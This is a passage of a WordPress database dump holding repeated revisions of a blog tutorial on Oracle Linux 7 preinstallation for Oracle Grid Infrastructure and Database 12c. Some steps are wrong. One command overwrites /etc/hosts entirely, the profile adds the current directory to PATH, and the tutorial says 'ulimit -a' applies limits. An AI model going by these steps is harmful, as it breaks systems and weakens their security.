/wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:58:50','2020-02-02 09:58:50','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(43,2,'2020-02-02 10:00:34','2020-02-02 10:00:34','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:00:34','2020-02-02 10:00:34','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(44,2,'2020-02-02 10:02:11','2020-02-02 10:02:11','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:02:11','2020-02-02 10:02:11','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(46,2,'2020-02-02 10:13:25','2020-02-02 10:13:25','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:13:25','2020-02-02 10:13:25','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(47,2,'2020-02-02 10:14:34','2020-02-02 10:14:34','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your 